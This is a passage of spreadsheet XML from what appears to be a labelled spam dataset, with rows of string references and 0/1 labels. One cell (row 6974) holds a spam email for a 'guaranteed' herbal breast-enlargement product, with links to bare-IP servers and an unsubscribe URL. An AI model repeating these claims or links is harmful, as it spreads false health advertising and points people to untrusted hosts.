      <c r="C6929" s="1" t="s">
        <v>8217</v>
      </c>
      <c r="D6929" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6930" hidden="1">
      <c r="A6930" s="1">
        <v>6928.0</v>
      </c>
      <c r="B6930" s="1" t="s">
        <v>531</v>
      </c>
      <c r="C6930" s="1" t="s">
        <v>532</v>
      </c>
      <c r="D6930" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6931" hidden="1">
      <c r="A6931" s="1">
        <v>6929.0</v>
      </c>
      <c r="B6931" s="1" t="s">
        <v>6570</v>
      </c>
      <c r="C6931" s="1" t="s">
        <v>6571</v>
      </c>
      <c r="D6931" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6932" hidden="1">
      <c r="A6932" s="1">
        <v>6930.0</v>
      </c>
      <c r="B6932" s="1" t="s">
        <v>4331</v>
      </c>
      <c r="C6932" s="1" t="s">
        <v>8855</v>
      </c>
      <c r="D6932" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6933" hidden="1">
      <c r="A6933" s="1">
        <v>6931.0</v>
      </c>
      <c r="B6933" s="1" t="s">
        <v>1120</v>
      </c>
      <c r="C6933" s="1" t="s">
        <v>6478</v>
      </c>
      <c r="D6933" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6934">
      <c r="A6934" s="1">
        <v>6932.0</v>
      </c>
      <c r="B6934" s="1" t="s">
        <v>8036</v>
      </c>
      <c r="C6934" s="1" t="s">
        <v>8856</v>
      </c>
      <c r="D6934" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6935" hidden="1">
      <c r="A6935" s="1">
        <v>6933.0</v>
      </c>
      <c r="B6935" s="1" t="s">
        <v>4498</v>
      </c>
      <c r="C6935" s="1" t="s">
        <v>4499</v>
      </c>
      <c r="D6935" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6936" hidden="1">
      <c r="A6936" s="1">
        <v>6934.0</v>
      </c>
      <c r="B6936" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C6936" s="1" t="s">
        <v>813</v>
      </c>
      <c r="D6936" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6937">
      <c r="A6937" s="1">
        <v>6935.0</v>
      </c>
      <c r="B6937" s="1" t="s">
        <v>8857</v>
      </c>
      <c r="C6937" s="1" t="s">
        <v>8858</v>
      </c>
      <c r="D6937" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6938">
      <c r="A6938" s="1">
        <v>6936.0</v>
      </c>
      <c r="B6938" s="1" t="s">
        <v>4431</v>
      </c>
      <c r="C6938" s="1" t="s">
        <v>7597</v>
      </c>
      <c r="D6938" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6939" hidden="1">
      <c r="A6939" s="1">
        <v>6937.0</v>
      </c>
      <c r="B6939" s="1" t="s">
        <v>4739</v>
      </c>
      <c r="C6939" s="1" t="s">
        <v>4740</v>
      </c>
      <c r="D6939" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6940" hidden="1">
      <c r="A6940" s="1">
        <v>6938.0</v>
      </c>
      <c r="B6940" s="1" t="s">
        <v>2837</v>
      </c>
      <c r="C6940" s="1" t="s">
        <v>2838</v>
      </c>
      <c r="D6940" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6941" hidden="1">
      <c r="A6941" s="1">
        <v>6939.0</v>
      </c>
      <c r="B6941" s="1" t="s">
        <v>8859</v>
      </c>
      <c r="C6941" s="1" t="s">
        <v>8860</v>
      </c>
      <c r="D6941" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6942">
      <c r="A6942" s="1">
        <v>6940.0</v>
      </c>
      <c r="B6942" s="1" t="s">
        <v>8861</v>
      </c>
      <c r="C6942" s="1" t="s">
        <v>8862</v>
      </c>
      <c r="D6942" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6943" hidden="1">
      <c r="A6943" s="1">
        <v>6941.0</v>
      </c>
      <c r="B6943" s="1" t="s">
        <v>8863</v>
      </c>
      <c r="C6943" s="1" t="s">
        <v>8864</v>
      </c>
      <c r="D6943" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6944" hidden="1">
      <c r="A6944" s="1">
        <v>6942.0</v>
      </c>
      <c r="B6944" s="1" t="s">
        <v>2377</v>
      </c>
      <c r="C6944" s="1" t="s">
        <v>2378</v>
      </c>
      <c r="D6944" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6945">
      <c r="A6945" s="1">
        <v>6943.0</v>
      </c>
      <c r="B6945" s="1" t="s">
        <v>8865</v>
      </c>
      <c r="C6945" s="1" t="s">
        <v>8866</v>
      </c>
      <c r="D6945" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6946" hidden="1">
      <c r="A6946" s="1">
        <v>6944.0</v>
      </c>
      <c r="B6946" s="1" t="s">
        <v>2030</v>
      </c>
      <c r="C6946" s="1" t="s">
        <v>2031</v>
      </c>
      <c r="D6946" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6947" hidden="1">
      <c r="A6947" s="1">
        <v>6945.0</v>
      </c>
      <c r="B6947" s="1" t="s">
        <v>1723</v>
      </c>
      <c r="C6947" s="1" t="s">
        <v>6817</v>
      </c>
      <c r="D6947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6948" hidden="1">
      <c r="A6948" s="1">
        <v>6946.0</v>
      </c>
      <c r="B6948" s="1" t="s">
        <v>8867</v>
      </c>
      <c r="C6948" s="1" t="s">
        <v>8868</v>
      </c>
      <c r="D6948" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6949" hidden="1">
      <c r="A6949" s="1">
        <v>6947.0</v>
      </c>
      <c r="B6949" s="1" t="s">
        <v>2020</v>
      </c>
      <c r="C6949" s="1" t="s">
        <v>8869</v>
      </c>
      <c r="D6949" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6950" hidden="1">
      <c r="A6950" s="1">
        <v>6948.0</v>
      </c>
      <c r="B6950" s="1" t="s">
        <v>3746</v>
      </c>
      <c r="C6950" s="1" t="s">
        <v>3747</v>
      </c>
      <c r="D6950" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6951" hidden="1">
      <c r="A6951" s="1">
        <v>6949.0</v>
      </c>
      <c r="B6951" s="1" t="s">
        <v>8870</v>
      </c>
      <c r="C6951" s="1" t="s">
        <v>8871</v>
      </c>
      <c r="D6951" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6952" hidden="1">
      <c r="A6952" s="1">
        <v>6950.0</v>
      </c>
      <c r="B6952" s="1" t="s">
        <v>6168</v>
      </c>
      <c r="C6952" s="1" t="s">
        <v>6169</v>
      </c>
      <c r="D6952" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6953" hidden="1">
      <c r="A6953" s="1">
        <v>6951.0</v>
      </c>
      <c r="B6953" s="1" t="s">
        <v>6297</v>
      </c>
      <c r="C6953" s="1" t="s">
        <v>6298</v>
      </c>
      <c r="D6953" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6954">
      <c r="A6954" s="1">
        <v>6952.0</v>
      </c>
      <c r="B6954" s="1" t="s">
        <v>8872</v>
      </c>
      <c r="C6954" s="1" t="s">
        <v>8873</v>
      </c>
      <c r="D6954" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6955" hidden="1">
      <c r="A6955" s="1">
        <v>6953.0</v>
      </c>
      <c r="B6955" s="1" t="s">
        <v>2131</v>
      </c>
      <c r="C6955" s="1" t="s">
        <v>6529</v>
      </c>
      <c r="D6955" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6956">
      <c r="A6956" s="1">
        <v>6954.0</v>
      </c>
      <c r="B6956" s="1" t="s">
        <v>8874</v>
      </c>
      <c r="C6956" s="1" t="s">
        <v>8875</v>
      </c>
      <c r="D6956" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6957">
      <c r="A6957" s="1">
        <v>6955.0</v>
      </c>
      <c r="B6957" s="1" t="s">
        <v>8876</v>
      </c>
      <c r="C6957" s="1" t="s">
        <v>8877</v>
      </c>
      <c r="D6957" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6958">
      <c r="A6958" s="1">
        <v>6956.0</v>
      </c>
      <c r="B6958" s="1" t="s">
        <v>8878</v>
      </c>
      <c r="C6958" s="1" t="s">
        <v>8879</v>
      </c>
      <c r="D6958" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6959" hidden="1">
      <c r="A6959" s="1">
        <v>6957.0</v>
      </c>
      <c r="B6959" s="1" t="s">
        <v>97</v>
      </c>
      <c r="C6959" s="1" t="s">
        <v>8880</v>
      </c>
      <c r="D6959" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6960" hidden="1">
      <c r="A6960" s="1">
        <v>6958.0</v>
      </c>
      <c r="B6960" s="1" t="s">
        <v>210</v>
      </c>
      <c r="C6960" s="1" t="s">
        <v>8881</v>
      </c>
      <c r="D6960" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6961" hidden="1">
      <c r="A6961" s="1">
        <v>6959.0</v>
      </c>
      <c r="B6961" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6961" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="D6961" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6962" hidden="1">
      <c r="A6962" s="1">
        <v>6960.0</v>
      </c>
      <c r="B6962" s="1" t="s">
        <v>6272</v>
      </c>
      <c r="C6962" s="1" t="s">
        <v>6273</v>
      </c>
      <c r="D6962" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6963" hidden="1">
      <c r="A6963" s="1">
        <v>6961.0</v>
      </c>
      <c r="B6963" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="C6963" s="1" t="s">
        <v>8882</v>
      </c>
      <c r="D6963" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6964" hidden="1">
      <c r="A6964" s="1">
        <v>6962.0</v>
      </c>
      <c r="B6964" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6964" s="1" t="s">
        <v>8883</v>
      </c>
      <c r="D6964" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6965">
      <c r="A6965" s="1">
        <v>6963.0</v>
      </c>
      <c r="B6965" s="1" t="s">
        <v>8884</v>
      </c>
      <c r="C6965" s="1" t="s">
        <v>8885</v>
      </c>
      <c r="D6965" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6966" hidden="1">
      <c r="A6966" s="1">
        <v>6964.0</v>
      </c>
      <c r="B6966" s="1" t="s">
        <v>8886</v>
      </c>
      <c r="C6966" s="1" t="s">
        <v>8887</v>
      </c>
      <c r="D6966" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6967" hidden="1">
      <c r="A6967" s="1">
        <v>6965.0</v>
      </c>
      <c r="B6967" s="1" t="s">
        <v>6095</v>
      </c>
      <c r="C6967" s="1" t="s">
        <v>8888</v>
      </c>
      <c r="D6967" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6968" hidden="1">
      <c r="A6968" s="1">
        <v>6966.0</v>
      </c>
      <c r="B6968" s="1" t="s">
        <v>5658</v>
      </c>
      <c r="C6968" s="1" t="s">
        <v>8889</v>
      </c>
      <c r="D6968" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6969" hidden="1">
      <c r="A6969" s="1">
        <v>6967.0</v>
      </c>
      <c r="B6969" s="1" t="s">
        <v>6944</v>
      </c>
      <c r="C6969" s="1" t="s">
        <v>6945</v>
      </c>
      <c r="D6969" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6970" hidden="1">
      <c r="A6970" s="1">
        <v>6968.0</v>
      </c>
      <c r="B6970" s="1" t="s">
        <v>4246</v>
      </c>
      <c r="C6970" s="1" t="s">
        <v>8890</v>
      </c>
      <c r="D6970" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6971" hidden="1">
      <c r="A6971" s="1">
        <v>6969.0</v>
      </c>
      <c r="B6971" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C6971" s="1" t="s">
        <v>8891</v>
      </c>
      <c r="D6971" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6972">
      <c r="A6972" s="1">
        <v>6970.0</v>
      </c>
      <c r="B6972" s="1" t="s">
        <v>8892</v>
      </c>
      <c r="C6972" s="1" t="s">
        <v>8893</v>
      </c>
      <c r="D6972" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6973" hidden="1">
      <c r="A6973" s="1">
        <v>6971.0</v>
      </c>
      <c r="B6973" s="1" t="s">
        <v>1850</v>
      </c>
      <c r="C6973" s="1" t="s">
        <v>1851</v>
      </c>
      <c r="D6973" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6974">
      <c r="A6974" s="1">
        <v>6972.0</v>
      </c>
      <c r="B6974" s="1" t="s">
        <v>7926</v>
      </c>
      <c r="C6974" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@netcomuk.co.uk
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6974" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6975">
      <c r="A6975" s="1">
        <v>6973.0</v>
      </c>
      <c r="B6975" s="1" t="s">
        <v>7994</v>
      </c>
      <c r="C6975" s="1" t="s">
        <v>8894</v>
      </c>
      <c r="D6975" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6976">
      <c r="A6976" s="1">
        <v>6974.0</v>
      </c>
      <c r="B6976" s="1" t="s">
        <v>128</v>
      </c>
      <c r="C6976" s="1" t="s">
        <v>129</v>
      </c>
      <c r="D6976" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6977">
      <c r="A6977" s="1">
        <v>6975.0</v>
      </c>
      <c r="B6977" s="1" t="s">
        <v>3161</v>
      </c>
      <c r="C6977" s="1" t="s">
        <v>3162</v>
      </c>
      <c r="D6977" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6978">
      <c r="A6978" s="1">
        <v>6976.0</v>
      </c>
      <c r="B6978" s="1" t="s">
        <v>8895</v>
      </c>
      <c r="C6978" s="1" t="s">
        <v>8896</v>
      </c>
      <c r="D6978" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6979" hidden="1">
      <c r="A6979" s="1">
        <v>6977.0</v>
      </c>
      <c r="B6979" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C6979" s="1" t="s">
        <v>271</v>
      </c>
      <c r="D6979" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6980">
      <c r="A6980" s="1">
        <v>6978.0</v>
      </c>
      <c r="B6980" s="1" t="s">
        <v>8897</v>
      </c>
      <c r="C6980" s="1" t="s">
        <v>8898</v>
      </c>
      <c r="D6980" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6981" hidden="1">
      <c r="A6981" s="1">
        <v>6979.0</v>
      </c>
      <c r="B6981" s="1" t="s">
        <v>8842</v>
      </c>
      <c r="C6981" s="1" t="s">
        <v>8843</v>
      </c>
      <c r="D6981" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6982" hidden="1">
      <c r="A6982" s="1">
        <v>6980.0</v>
      </c>
      <c r="B6982" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C6982" s="1" t="s">
        <v>5259</v>
      </c>
      <c r="D6982" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6983" hidden="1">
      <c r="A6983" s="1">
        <v>6981.0</v>
      </c>
      <c r="B6983" s="1" t="s">
        <v>5373</v>
      </c>
      <c r="C6983" s="1" t="s">
        <v>8899</v>
      </c>
      <c r="D6983" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6984">
      <c r="A6984" s="1">
        <v>6982.0</v>
      </c>
      <c r="B6984" s="1" t="s">
        <v>8900</v>
      </c>
      <c r="C6984" s="1" t="s">
        <v>8901</v>
      </c>
      <c r="D6984" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6985" hidden="1">
      <c r="A6985" s="1">
        <v>6983.0</v>
      </c>
      <c r="B6985" s="1" t="s">
        <v>7222</v>
      </c>
      <c r="C6985" s="1" t="s">
        <v>7223</v>
      </c>
      <c r="D6985" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6986" hidden="1">
      <c r="A6986" s="1">
        <v>6984.0</v>
      </c>
      <c r="B6986" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6986" s="1" t="s">
        <v>513</v>
      </c>
      <c r="D6986" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6987">
      <c r="A6987" s="1">
        <v>6985.0</v>
      </c>
      <c r="B6987" s="1" t="s">
        <v>5599</v>
      </c>
      <c r="C6987" s="1" t="s">
        <v>8902</v>
      </c>
      <c r="D6987" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6988">
      <c r="A6988" s="1">
        <v>6986.0</v>
      </c>
      <c r="B6988" s="1" t="s">
        <v>7382</v>
      </c>
      <c r="C6988" s="1" t="s">
        <v>7383</v>
      </c>
      <c r="D6988" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6989">
      <c r="A6989" s="1">
        <v>6987.0</v>
      </c>
      <c r="B6989" s="1" t="s">
        <v>2330</v>
      </c>
      <c r="C6989" s="1" t="s">
        <v>2331</v>
      </c>
      <c r="D6989" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6990" hidden="1">
      <c r="A6990" s="1">
        <v>6988.0</v>
      </c>
      <c r="B6990" s="1" t="s">
        <v>8471</v>
      </c>
      <c r="C6990" s="1" t="s">
        <v>8472</v>
      </c>
      <c r="D6990" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6991" hidden="1">
      <c r="A6991" s="1">
        <v>6989.0</v>
      </c>
      <c r="B6991" s="1" t="s">
        <v>8903</v>
      </c>
      <c r="C6991" s="1" t="s">
        <v>8904</v>
      </c>
      <c r="D6991" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6992">
      <c r="A6992" s="1">
        <v>6990.0</v>
      </c>
      <c r="B6992" s="1" t="s">
        <v>8905</v>
      </c>
      <c r="C6992" s="1" t="s">
        <v>8906</v>
      </c>
      <c r="D6992" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6993" hidden="1">
      <c r="A6993" s="1">
        <v>6991.0</v>
      </c>
      <c r="B6993" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C6993" s="1" t="s">
        <v>6105</v>
      </c>
      <c r="D6993" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6994" hidden="1">
      <c r="A6994" s="1">
        <v>6992.0</v>
      </c>
      <c r="B6994" s="1" t="s">
        <v>8853</v>
      </c>
      <c r="C6994" s="1" t="s">
        <v>8854</v>
      </c>
      <c r="D6994" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6995" hidden="1">
      <c r="A6995" s="1">
        <v>6993.0</v>
      </c>
      <c r="B6995" s="1" t="s">
        <v>4354</v>
      </c>
      <c r="C6995" s="1" t="s">
        <v>7501</v>
      </c>
      <c r="D6995" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6996" hidden="1">
      <c r="A6996" s="1">
        <v>6994.0</v>
      </c>
      <c r="B6996" s="1" t="s">
        <v>3171</v>
      </c>
      <c r="C6996" s="1" t="s">
        <v>3172</v>
      </c>
      <c r="D6996" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6997" hidden="1">
      <c r="A6997" s="1">
        <v>6995.0</v>
      </c>
      <c r="B6997" s="1" t="s">
        <v>8907</v>
      </c>
      <c r="C6997" s="1" t="s">
        <v>8908</v>
      </c>
      <c r="D6997" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6998" hidden="1">
      <c r="A6998" s="1">
        <v>6996.0</v>
      </c>
      <c r="B6998" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C6998" s="1" t="s">
        <v>6844</v>
      </c>
      <c r="D6998" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6999" hidden="1">
      <c r="A6999" s="1">
        <v>6997.0</v>
      </c>
      <c r="B6999" s="1" t="s">
        <v>8870</v>
      </c>
      <c r="C6999" s="1" t="s">
        <v>8871</v>
      </c>
      <c r="D6999" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7000" hidden="1">
      <c r="A7000" s="1">
        <v>6998.0</v>
      </c>
      <c r="B7000" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C7000" s="1" t="s">
        <v>8675</v>
      </c>
      <c r="D7000" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7001" hidden="1">
      <c r="A7001" s="1">
        <v>6999.0</v>
      </c>
      <c r="B7001" s="1" t="s">
        <v>8609</v>
      </c>
      <c r="C7001" s="1" t="s">
        <v>8610</v>
      </c>
      <c r="D7001" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7002" hidden="1">
      <c r="A7002" s="1">
        <v>7000.0</v>
      </c>
      <c r="B7002" s="1" t="s">
        <v>313</v>
      </c>
      <c r="C7002" s="1" t="s">
        <v>8909</v>
      </c>
      <c r="D7002" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7003">
      <c r="A7003" s="1">
        <v>7001.0</v>
      </c>
      <c r="B7003" s="1" t="s">
        <v>1109</v>
      </c>
      <c r="C7003" s="1" t="s">
        <v>1110</v>
      </c>
      <c r="D7003" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7004">
      <c r="A7004" s="1">
        <v>7002.0</v>
      </c>
      <c r="B7004" s="1" t="s">
        <v>4555</v>
      </c>
      <c r="C7004" s="1" t="s">
        <v>4556</v>
      </c>
      <c r="D7004" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7005" hidden="1">
      <c r="A7005" s="1">
        <v>7003.0</v>
      </c>
      <c r="B7005" s="1" t="s">
        <v>8910</v>
      </c>
      <c r="C7005" s="1" t="s">
        <v>8911</v>
      </c>
      <c r="D7005" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7006" hidden="1">
      <c r="A7006" s="1">
        <v>7004.0</v>
      </c>
      <c r="B7006" s="1" t="s">
        <v>676</v>
      </c>
      <c r="C7006" s="1" t="s">
        <v>5759</v>
      </c>
      <c r="D7006" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7007" hidden="1">
      <c r="A7007" s="1">
        <v>7005.0</v>
      </c>
      <c r="B7007" s="1" t="s">
        <v>8392</v>
      </c>
      <c r="C7007" s="1" t="s">
        <v>8393</v>
      </c>
      <c r="D7007" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7008">
      <c r="A7008" s="1">
        <v>7006.0</v>
      </c>
      <c r="B7008" s="1" t="s">
        <v>4822</v>
      </c>
      <c r="C7008" s="1" t="s">
        <v>4823</v>
      </c>
      <c r="D7008" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7009" hidden="1">
      <c r="A7009" s="1">
        <v>7007.0</v>
      </c>
      <c r="B7009" s="1" t="s">
        <v>6067</v>
      </c>
      <c r="C7009" s="1" t="s">
        <v>6068</v>
      </c>
      <c r="D7009" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7010" hidden="1">
      <c r="A7010" s="1">
        <v>7008.0</v>
      </c>
      <c r="B7010" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="C7010" s="1" t="s">
        <v>6795</v>
      </c>
      <c r="D7010" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7011" hidden="1">
      <c r="A7011" s="1">
        <v>7009.0</v>
      </c>
      <c r="B7011" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C7011" s="1" t="s">
        <v>8912</v>
      </c>
      <c r="D7011" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7012">
      <c r="A7012" s="1">
        <v>7010.0</v>
      </c>
      <c r="B7012" s="1" t="s">
        <v>8913</v>
      </c>
      <c r="C7012" s="1" t="s">
        <v>8914</v>
      </c>
      <c r="D7012" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7013">
      <c r="A7013" s="1">
        <v>7011.0</v>
      </c>
      <c r="B7013" s="1" t="s">
        <v>8915</v>
      </c>
      <c r="C7013" s="1" t="s">
        <v>8916</v>
      </c>
      <c r="D7013" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7014" hidden="1">
      <c r="A7014" s="1">
        <v>7012.0</v>
      </c>
      <c r="B7014" s="1" t="s">
        <v>2158</v>
      </c>
      <c r="C7014" s="1" t="s">
        <v>8917</v>
      </c>
      <c r="D7014" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7015" hidden="1">
      <c r="A7015" s="1">
        <v>7013.0</v>
      </c>
      <c r="B7015" s="1" t="s">
        <v>908</v>
      </c>
      <c r="C7015" s="1" t="s">
        <v>5414</v>
      </c>
      <c r="D7015" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7016">
      <c r="A7016" s="1">
        <v>7014.0</v>
      </c>
      <c r="B7016" s="1" t="s">
        <v>4316</v>
      </c>
      <c r="C7016" s="1" t="s">
        <v>4317</v>
      </c>
      <c r="D7016" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7017" hidden="1">
      <c r="A7017" s="1">
        <v>7015.0</v>
      </c>
      <c r="B7017" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C7017" s="1" t="s">
        <v>8918</v>
      </c>
      <c r="D7017" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7018" hidden="1">
      <c r="A7018" s="1">
        <v>7016.0</v>
      </c>
      <c r="B7018" s="1" t="s">
        <v>3194</v>
      </c>
      <c r="C7018" s="1" t="s">
        <v>3195</v>
      </c>
      <c r="D7018" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7019" hidden="1">
      <c r="A7019" s="1">
        <v>7017.0</v>
      </c>
      <c r="B7019" s="1" t="s">
        <v>7400</v>
      </c>
      <c r="C7019" s="1" t="s">
        <v>8919</v>
      </c>
      <c r="D7019" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7020" hidden="1">
      <c r="A7020" s="1">
        <v>7018.0</v>
      </c>
      <c r="B7020" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="C7020" s="1" t="s">
        <v>2165</v>
      </c>
      <c r="D7020" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7021" hidden="1">
      <c r="A7021" s="1">
        <v>7019.0</v>
      </c>
      <c r="B7021" s="1" t="s">
        <v>8734</v>
      </c>
      <c r="C7021" s="1" t="s">
        <v>8735</v>
      </c>
      <c r="D7021" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7022">
      <c r="A7022" s="1">
        <v>7020.0</v>
      </c>
      <c r="B7022" s="1" t="s">
        <v>3135</v>
      </c>
      <c r="C7022" s="1" t="s">
        <v>3136</v>
      </c>
      <c r="D7022" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7023" hidden="1">
      <c r="A7023" s="1">
        <v>7021.0</v>
      </c>
      <c r="B7023" s="1" t="s">
        <v>7674</v>
      </c>
      <c r="C7023" s="1" t="s">
        <v>8920</v>
      </c>
      <c r="D7023" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7024">
      <c r="A7024" s="1">
        <v>7022.0</v>
      </c>
      <c r="B7024" s="1" t="s">
        <v>8921</v>
      </c>
      <c r="C7024" s="1" t="s">
        <v>8922</v>
      </c>
      <c r="D7024" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7025" hidden="1">
      <c r="A7025" s="1">
        <v>7023.0</v>
      </c>
      <c r="B7025" s="1" t="s">
        <v>2492</v>
      </c>
      <c r="C7025" s="1" t="s">
        <v>8923</v>
      </c>
      <c r="D7025" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7026">
      <c r="A7026" s="1">
        <v>7024.0</v>
      </c>
      <c r="B7026" s="1" t="s">
        <v>4611</v>
      </c>
      <c r="C7026" s="1" t="s">
        <v>4612</v>
      </c>
      <c r="D7026" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7027">
      <c r="A7027" s="1">
        <v>7025.0</v>
      </c>
      <c r="B7027" s="1" t="s">
        <v>8924</v>
      </c>
      <c r="C7027" s="1" t="s">
        <v>8925</v>
      </c>
      <c r="D7027" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7028" hidden="1">
      <c r="A7028" s="1">
        <v>7026.0</v>
      </c>
      <c r="B7028" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C7028" s="1" t="s">
        <v>2412</v>
      </c>
      <c r="D7028" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7029" hidden="1">
      <c r="A7029" s="1">
        <v>7027.0</v>
      </c>
      <c r="B7029" s="1" t="s">
        <v>4580</v>
      </c>
      <c r="C7029" s="1" t="s">
        <v>4581</v>
      </c>
      <c r="D7029" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7030" hidden="1">
      <c r="A7030" s="1">
        <v>7028.0</v>
      </c>
      <c r="B7030" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="C7030" s="1" t="s">
        <v>6835</v>
      </c>
      <c r="D7030" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7031" hidden="1">
      <c r="A7031" s="1">
        <v>7029.0</v>
      </c>
      <c r="B7031" s="1" t="s">
        <v>4828</v>
      </c>
      <c r="C7031" s="1" t="s">
        <v>8926</v>
      </c>
